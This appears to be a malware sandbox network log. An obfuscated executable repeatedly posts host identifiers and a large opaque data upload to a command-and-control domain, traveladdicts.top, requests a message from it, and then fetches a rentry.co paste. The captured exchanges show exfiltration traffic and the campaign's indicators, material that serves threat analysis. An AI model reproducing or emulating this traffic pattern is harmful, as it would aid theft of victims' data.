                                                                                                                                                Data Ascii: |lQJ$nInVZ+?:us}Q0u?4E([:s~
2025-01-28 15:13:04 UTC  1134               IN         HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:13:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=l538tq8f8kg94ejhknl7shva52; expires=Sat, 24 May 2025 08:59:42 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lhLsG1jj6kE6nudD1sJIrAINrweZKgaHL8SmxXi7xGFzdeQ1U4QiB1M7lkbgDPktCWGiuFh8%2FbqAIVYaqyIaejOEP8IlxDlrZLgLRVrKfwCvx%2BSsgGrsgz087W%2FgtAx2qREszw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091ec99d9387c8e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1849&rtt_var=722&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21530&delivery_rate=1579232&cwnd=249&unsent_bytes=0&cid=df115222299ae692&ts=1167&x=0"
2025-01-28 15:13:04 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-28 15:13:04 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.9  49234        172.67.202.141  443               7772  C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-28 15:13:05 UTC  283                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=UDD2YJGU6IP3ESK79Y4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2656
    Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:05 UTC2656OUTData Raw: 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c
                                                                                                                                                Data Ascii: --UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="pid"1--UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="lid"MeHdy4--pl
2025-01-28 15:13:21 UTC  1134               IN         HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:13:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=v42fo50bfeolv3637be68rrdup; expires=Sat, 24 May 2025 08:59:56 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mTgrBFE7rz9f71dvqUmrjexzcz9zUVY%2BFMBOrMpQZLwOQTp5x%2FN%2BLfRs3AujARdKnXCFf30q%2BPaDrDiijpYFZutortUH0F52AjF3xPJ9JKY6TdpalZBcKMGML5GvhyejwHCKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091ecaa2a430f9d-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1560&rtt_var=608&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=3575&delivery_rate=1764350&cwnd=193&unsent_bytes=0&cid=07ca3dce1afb5637&ts=15753&x=0"
2025-01-28 15:13:21 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-28 15:13:21 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6
Source IP: 192.168.2.9
Source Port: 49235
Destination IP: 172.67.202.141
Destination Port: 443
PID: 7772
Process: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                2025-01-28 15:13:23 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=FCR2CY7USXN11D4G
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 574644
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --FCR2CY7USXN11D4GContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--FCR2CY7USXN11D4GContent-Disposition: form-data; name="pid"1--FCR2CY7USXN11D4GContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 62 08 cb 83 3f 05 36 2a 8e 61 ab 6b 21 fa f4 7f a0 03 a6 01 ee 4d fa e2 ee 7a a3 98 70 2f 14 dd af 4d ce 1e 50 ef 1e 02 ec d6 79 df d9 93 28 4e 86 1f eb 6e 47 1f 02 c7 44 0d 66 23 fa a4 9b c2 d7 3e fc 6f 22 ec ff d0 af 27 16 58 6c 0b d0 bd 01 5d 12 f3 7b 59 4a fe 08 50 83 5a 15 e7 34 ac 09 2c 3c 67 4b 43 5b 81 ee bc 1c d5 ec 87 ef e7 36 1c e0 97 46 ec 2c 2c 3a 15 22 cf 2e 17 7b 7c 05 8c 72 33 a2 ea 75 e0 eb 5a c2 af 0d 47 f1 10 ae 8f d1 b4 b0 79 de b4 14 8d c2 b3 03 b8 a1 08 69 74 5b bc 31 83 a9 cf 78 70 9e 93 f6 91 18 da 24 9c d3 77 1d fd 5a c6 7a bc 52 1c cc b4 1a d7 f4 3e a6 3c fe 9b be 93 5d cc dd f0 ce 1b 0f eb 9f 8d 20 be a8 1d 67 d9 0b 1f f3 1e f9 05 61 50 02 97 c1 75 13 e2 cb 5a 3d 21 6b 77 d4 45 8d 64 a4 bb c8 37 04 b4 f0 b5 9d e6 e5 b8 82 32 b4
                                                                                                                                                Data Ascii: b?6*ak!Mzp/MPy(NnGDf#>o"'Xl]{YJPZ4,<gKC[6F,,:".{|r3uZGyit[1xp$wZzR><] gaPuZ=!kwEd72
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 07 4a 0f 9e c2 ea 53 ee 6b ce de 61 c3 f3 a1 2d 47 03 3f cf d3 02 3f 8c 84 55 55 cd 97 0d 0e d1 d8 0b 2c ef 09 74 b1 a1 80 43 af 3a c0 ac 56 b1 67 a4 16 86 56 da 02 0f 64 04 bd 38 79 24 f4 b3 59 4c 80 fc a9 9a 7f 51 95 b3 08 a0 98 c7 2d 8d 1f 04 70 bf df 0f f6 d3 31 4e 0b 63 84 df 3d 76 56 1e e4 4d b3 f9 41 a9 91 12 3d d7 1b 9d 77 34 67 6d e5 ff 65 1a 88 ae 8e 06 6f 90 1e ca 08 cc e9 6f 97 ca 03 59 53 d0 8f f0 c4 ff 57 98 2c 5e 63 5e 5d c0 65 fd 2e dd a3 0e 08 04 80 d1 28 2c 52 8c 5c 9c 9d c6 5c 86 22 74 19 2d 3f 7c 46 5e 6e 47 f2 ab 45 21 fd e1 f6 51 89 4c 95 f5 83 0f fd 53 4a 2b 3f 51 ff c5 17 a2 c8 4e e3 76 9f 5f 34 5e f0 dd be 34 49 04 99 8f a3 0b a1 14 0f 7f c4 31 fb 64 49 4d c1 1d 5c e1 98 ce aa ba d2 82 5f b7 91 5b 71 b2 8b 23 ea 75 e1 42 28 b2 78
                                                                                                                                                Data Ascii: JSka-G??UU,tC:VgVd8y$YLQ-p1Nc=vVMA=w4gmeooYSW,^c^]e.(,R\\"t-?|F^nGE!QLSJ+?QNv_4^4I1dIM\_[q#uB(x
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 9d 5b 01 19 e5 0f 60 4c e6 ce d5 e3 28 7f 45 e0 d8 33 43 0c ab c4 32 1e 14 c1 13 b2 12 f4 d0 bf a4 04 a0 90 f0 4b 80 a4 cb d2 5c 12 32 af 22 26 89 62 45 c0 07 51 4d 0b 90 56 1b 74 09 e0 19 39 23 c3 0a 62 23 15 db 5e d1 f5 85 34 9f 84 5d de 47 6c 06 c8 05 04 fb 81 1e 5c 1c ec 5d 68 73 4f 41 ac ee d9 ad b2 fe 60 36 a6 92 c4 cf bd 88 cf 69 5c cc f0 e1 7a 38 e8 a2 f1 1b 02 ca b5 0f b1 42 97 ff 28 e1 60 e7 d0 70 a9 68 65 d7 b5 9e c4 1b d2 40 45 4e 05 b4 4b 87 c9 28 9f 5d c0 ec 41 9e 28 0a c9 05 3c df 22 45 e5 32 99 8d 1d a0 40 0b ae 0e de b0 34 82 5b fa 1d 90 d4 c9 99 4a 5f c1 b4 98 95 91 7a 3d 1a d2 8f 32 b7 e3 25 11 6f d3 73 f1 96 d2 3e 8f f4 b4 66 98 00 4d 03 f1 50 06 33 6e 54 a6 3a be 9e ff 5d 09 37 87 1d a1 6c 73 ab d3 a5 78 34 a7 36 0b d9 d4 43 2e ab 1e
                                                                                                                                                Data Ascii: [`L(E3C2K\2"&bEQMVt9#b#^4]Gl\]hsOA`6i\z8B(`phe@ENK(]A(<"E2@4[J_z=2%os>fMP3nT:]7lsx46C.
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 7a d5 2d 70 92 1f 57 18 dc 7c 46 68 51 07 36 75 e4 be 17 b4 32 bc 80 80 36 eb c0 f8 c7 25 9e ae 56 3c 88 17 76 69 fe f3 7a 29 ce 92 e4 37 17 79 b1 02 27 68 86 8f 0d dc 50 30 b6 5b 2e 0b 33 e2 67 7b 98 ed bf f2 ba 32 a8 02 f3 f0 1d f2 b0 4b aa 3e 42 9c eb 2d 94 e3 7d 78 46 52 0b 96 3c 3d 1f 17 32 4b 27 64 9b 43 fa 12 58 80 a7 19 d2 42 40 35 64 3e 1d d0 f6 b2 59 85 af fe e8 ab 60 55 04 54 f0 49 c5 4b 89 92 af aa a3 85 db 8c 26 2e 7e ff a2 68 51 8e e0 e6 ab 20 1d b0 eb 45 5a c2 cd 92 91 95 03 58 48 d7 32 fe ef 8b a0 04 18 87 00 34 41 f7 3e 58 c3 00 89 42 60 e7 b7 e6 a7 72 8d 5d 18 49 48 82 d9 bf a9 2a a1 9e c6 fd fe 87 ad 23 04 20 47 df 71 b8 ee 88 2c 87 4d 54 d0 73 85 06 3a 9d 28 11 8e ef 8c 94 09 e3 e3 5f d9 20 74 3f b6 cf bb 9f fa 1d bb 7f b4 22 82 26 83
                                                                                                                                                Data Ascii: z-pW|FhQ6u26%V<viz)7y'hP0[.3g{2K>B-}xFR<=2K'dCXB@5d>Y`UTIK&.~hQ EZXH24A>XB`r]IH*# Gq,MTs:(_ t?"&
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: ea da 22 71 ed 9b c0 06 6b e7 3f 87 05 d2 37 d2 7b 99 21 bf ae 13 68 ea fb d1 77 b3 5e 3f de 1a d5 59 0d 9e 3d b9 c4 e1 6e 48 3a 44 d5 03 b5 a2 6b 6a 4f 64 ee 3f fb 24 e3 4f c7 ef e3 6e d4 ea f5 19 85 0c 23 68 5f de 1a 9b 5b 6a cc a2 c1 3d 22 7d 85 03 c4 50 38 e8 6b 18 aa 30 02 96 57 de 48 5a 6b f0 3d 6e 10 c0 0d 25 c9 81 5c 55 28 47 0e 58 ba 4e 49 51 9d 42 b2 0e 01 57 17 70 64 7e 0e 05 6c 97 35 1c 00 59 1a 35 df c7 4d fb 78 83 ac 83 2c f2 68 72 3a 05 72 69 ed 0f f6 7a 04 07 4c c1 39 34 5f c2 84 aa 8f b4 b1 3e 55 df 7f 56 ab 28 a5 72 3b 5f 2e d9 ad 3f 72 1b 96 e4 3c f6 39 1f 3b 9d e6 3b 37 b3 98 72 10 e5 2f 94 e8 31 03 92 81 22 f2 03 30 77 61 42 03 1f 04 1b db d6 bb 82 a8 28 aa 1a e9 83 9f 7a 66 d5 f9 74 ca 88 95 eb 0d f0 6e af 6e 2c 27 01 82 0a 9d b3 5c
                                                                                                                                                Data Ascii: "qk?7{!hw^?Y=nH:DkjOd?$On#h_[j="}P8k0WHZk=n%\U(GXNIQBWpd~l5Y5Mx,hr:rizL94_>UV(r;_.?r<9;;7r/1"0waB(zftnn,'\
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: eb 38 f5 20 60 ea 22 13 2e 93 16 1a 45 0d 98 cc 10 0e 8b 9a 44 d9 92 73 55 41 50 9b 30 fd 9a de 1c d8 3f 5d dc 49 16 9a a8 5b d4 ea 5a ce fb 48 33 9b a0 09 4a 84 41 93 74 8e 92 f7 b4 a8 3b b2 a0 85 51 db 69 6d 1b 11 64 36 4c cd d2 0a 07 d4 5e a8 c5 ad 15 58 6a 64 6a 83 20 cf 41 ca 4f 20 f9 6c 49 04 11 aa bd 0a 6b a8 04 a4 00 13 7d e5 45 1b 57 bc 95 d9 20 65 66 47 0e d5 2d af 4c 93 19 a0 40 d0 bf 11 49 4f 26 92 0a f4 fd 19 33 43 75 c9 b8 a2 6d 43 cd 8d 4b 5a 2b 21 bd 87 55 e4 75 fd d3 05 7a 0f 9e 77 9c 88 f2 75 74 c6 6f 7c 04 27 07 23 c4 96 7a 34 3f 54 a2 d4 10 dc b1 18 0c 91 2e 91 e4 8e 7a 23 60 fe 4d 13 8b b6 23 29 0f ee b8 b9 b0 67 d4 d2 c3 07 10 f1 ed e0 ce 2f 05 12 3a de 16 34 04 bf 9f f6 41 00 ce 25 ec 76 f7 7a 8c dc d5 ea e4 bd a7 87 3a 1e 87 64 72
                                                                                                                                                Data Ascii: 8 `".EDsUAP0?]I[ZH3JAt;Qimd6L^Xjdj AO lIk}EW efG-L@IO&3CumCKZ+!Uuzwuto|'#z4?T.z#`M#)g/:4A%vz:dr
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 3f 58 e1 93 64 45 cb ac 40 b6 30 19 0d eb 6f 26 c2 1a 7f f9 56 db 4b ff 7d 40 f4 e5 59 db a1 70 1c 40 32 1e 6e ce 4a 77 db 53 7b b6 c8 86 1d ec 1b e7 cf 16 04 6e bf 33 d7 34 3c b0 b2 2d bb 39 22 f1 fa 10 53 9c 90 00 78 3f 7b 1f a5 c2 27 78 11 e8 8e 41 c4 76 24 e9 51 ff c1 b1 1a 54 84 2c f7 3c c8 7e 40 91 e3 ee 06 6a c3 b7 ed e4 50 51 fd bf 3f 5f e4 59 31 92 9f 94 59 a8 e8 38 2a 2a 08 be 93 84 30 aa d8 06 1c 3c 72 d2 d9 b1 61 3b 8b e7 0a f2 8b 02 33 10 a6 17 67 b9 77 e7 4e 93 f1 d4 53 26 0b 48 e9 ee b2 1b c2 e0 7a 95 5d 5a 88 24 50 95 df d5 e8 26 6e 9f 9e 59 99 b8 ec 12 28 35 1b ca 40 a1 4e 7a f7 bd 3f cb 1f 1b 0d 57 a4 fb f3 f9 dc 8e 8b 8e 9a 2d 2b 22 27 1e 72 46 d3 a8 a8 b1 38 2d 5d 84 3a d8 a5 39 71 64 e3 60 3c c1 01 a3 94 de c5 f6 33 67 a6 a1 e1 d9 de
                                                                                                                                                Data Ascii: ?XdE@0o&VK}@Yp@2nJwS{n34<-9"Sx?{'xAv$QT,<~@jPQ?_Y1Y8**0<ra;3gwNS&Hz]Z$P&nY(5@Nz?W-+"'rF8-]:9qd`<3g
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: be 5c 01 0a 18 9d 7b 5e 32 12 e6 23 54 8b 63 61 51 12 e0 4c 54 cc 11 56 79 96 f8 62 c9 0a 28 3f 35 6d a9 99 d2 bb c5 a2 7c 89 8d 5f 9f 2d 29 e5 9a 95 59 f0 63 47 79 8b 7e d7 ef cc e0 78 95 b5 8b 7d 19 ed 1b e3 a7 15 68 6a c2 a3 b2 24 a2 4a 2d 0a e6 25 1f 12 4a 13 ff c0 11 41 8e 0e 2e f7 cc d3 5f c3 ae 1d 6d ca 29 a4 d4 24 27 98 d0 cd 6a 6a 71 a4 84 11 a8 5f 5d d2 b0 69 bb cb 67 cf 48 3b 1f d8 2b 47 fa df a4 70 df c5 dd 24 83 c3 c0 5b ad 2d 27 fc 47 93 a2 16 80 b7 01 83 df 0b a3 18 7b 46 50 37 a7 6d 77 8f 46 73 2b 43 7d 37 5a b3 ac 91 7b 63 eb f1 8d e8 f5 08 f3 cf c3 7e 0d 9f 47 02 8f e4 dd e9 88 77 74 2a 16 68 d8 1d b7 63 46 c7 3c 8d a4 2a c6 ac 47 c8 09 38 fd f3 b2 d3 b1 0c dd 27 65 d9 f3 69 ee 57 c5 f4 6a c6 bf 7c 70 bc 31 ef 97 8f 23 69 3d 60 e9 6a 26
                                                                                                                                                Data Ascii: \{^2#TcaQLTVyb(?5m|_-)YcGy~x}hj$J-%JA._m)$'jjq_]igH;+Gp$[-'G{FP7mwFs+C}7Z{c~Gwt*hcF<*G8'eiWj|p1#i=`j&
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 69 e5 f4 a4 3f d0 b0 94 0b eb e4 54 1e 77 64 f0 a9 89 b1 49 08 b7 81 bb 64 fb a3 88 c8 5e ce 69 37 da 18 49 75 d8 26 4c bd 60 67 fb db 6c 5f 85 43 a9 9b e8 69 cb 51 d9 05 f2 a0 c3 4a df c2 92 03 e7 76 e8 48 d0 25 40 e6 72 27 69 eb 9b ce 7d e5 41 da b9 37 e5 74 72 83 34 f2 c3 b4 cb be 68 df 18 9e 2f f5 fe 26 5a 7c 7b 65 0f 6b f6 00 2f 91 78 11 6f ce a5 73 e3 43 b6 df d1 6e ca bd b0 5f d0 ce 7b 31 35 1c 3c 61 10 2d d0 89 24 57 00 24 08 5d ab 74 e3 83 bb 24 10 af 96 dc 0e ab 30 60 5a 7e 2d a7 22 64 b5 c7 6e c8 5a a3 7a 42 f1 f6 c4 e9 a0 2f 12 76 15 5c 3b 0c 56 57 12 e8 ea f9 34 7d 97 fc ff f1 f4 e6 f1 50 be df e3 ff 75 cf 6e 1f 4b b6 30 23 29 45 8c 24 bb 19 b4 28 85 56 2a cb 48 a8 b4 58 93 75 ee b1 f7 6a a1 cd 52 d6 4a 14 a1 a4 2c 31 83 a2 10 42 96 b2 8c 64
                                                                                                                                                Data Ascii: i?TwdId^i7Iu&L`gl_CiQJvH%@r'i}A7tr4h/&Z|{ek/xosCn_{15<a-$W$]t$0`Z~-"dnZzB/v\;VW4}PunK0#)E$(V*HXujRJ,1Bd
                                                                                                                                                2025-01-28 15:13:35 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:35 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=v5ufc5slie25hg4sspghnsptl7; expires=Sat, 24 May 2025 09:00:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzh1IpsAyxTO1EZyeAcP3vcf6aaoWFfMW7JhVQuP3J4wDOABxd3hbmoz%2FKt%2BnBiJ5fuBHDt9W5VaiwEbEn3FXMPp%2FqJRLwTj3dafeLlSiOw76tFDkoV7H7kDccqauwF94Ahezw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed185b238c6c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1852&rtt_var=718&sent=198&recv=589&lost=0&retrans=0&sent_bytes=2842&recv_bytes=577190&delivery_rate=1576673&cwnd=168&unsent_bytes=0&cid=1eb3841e325ad79d&ts=12824&x=0"


Session ID: 7
Source IP: 192.168.2.9
Source Port: 49236
Destination IP: 172.67.202.141
Destination Port: 443
PID: 7772
Process: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                2025-01-28 15:13:36 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 84
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:36 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d 26 68 77 69 64 3d 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31
                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl2yan1&j=&hwid=D0F235DE537687D22F2109764D00B0F1
                                                                                                                                                2025-01-28 15:13:37 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=1qfv0e8hf2qlec8cp2gqchf07l; expires=Sat, 24 May 2025 09:00:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC7nHrlVr1qeVex0pvkEwNGXa1iDjrdZl9OlBjn21Kc78oma0EzipFMA8qq2Rz0fEv7m6mxVcw60DQbZn%2BSb2%2Fv%2F%2B7tNugBhiRpU0xOagXk8ZM62bAts4oNJ0sGi1TgC3T2evg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed6b6de943cd-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1672&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=985&delivery_rate=1707602&cwnd=252&unsent_bytes=0&cid=e89c8012747c45f1&ts=768&x=0"
                                                                                                                                                2025-01-28 15:13:37 UTC126INData Raw: 37 38 0d 0a 74 62 2b 58 49 4c 77 56 48 6c 41 4c 36 5a 75 56 34 42 72 58 57 6e 78 41 6e 6d 31 4d 6e 6e 54 67 70 6e 38 56 67 79 67 42 4d 33 76 75 78 4c 56 56 6e 69 38 38 4f 48 2b 64 36 2b 62 61 52 76 67 47 55 7a 4c 37 41 7a 6a 73 44 63 37 46 45 45 6d 73 54 6d 52 63 44 74 44 49 38 68 58 67 4f 6d 77 78 66 4d 75 33 74 34 5a 75 39 57 42 4f 62 4c 77 49 62 71 52 45 6e 66 73 3d 0d 0a
                                                                                                                                                Data Ascii: 78tb+XILwVHlAL6ZuV4BrXWnxAnm1MnnTgpn8VgygBM3vuxLVVni88OH+d6+baRvgGUzL7AzjsDc7FEEmsTmRcDtDI8hXgOmwxfMu3t4Zu9WBObLwIbqREnfs=
                                                                                                                                                2025-01-28 15:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


Session ID: 8
Source IP: 192.168.2.9
Source Port: 49237
Destination IP: 104.26.3.16
Destination Port: 443
PID: 7772
Process: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                2025-01-28 15:13:37 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: rentry.co
                                                                                                                                                2025-01-28 15:13:37 UTC904INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:37 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                vary: Origin
                                                                                                                                                vary: accept-encoding
                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkXRJB%2Fs5vP1oGBpiFUPhRCJACrVgngHqPy%2Fy2l4j%2BiHMN%2BGcBdR8pXbOs%2BsxnutU6KoAPk7dNiEY8SR6vrwDz%2BGyr6LG8X1EsjXzz%2BQ6c%2B%2BbnH0q8IZF8IYDw%3D%3D"}],"group":"cf-nel","max_age":604800}
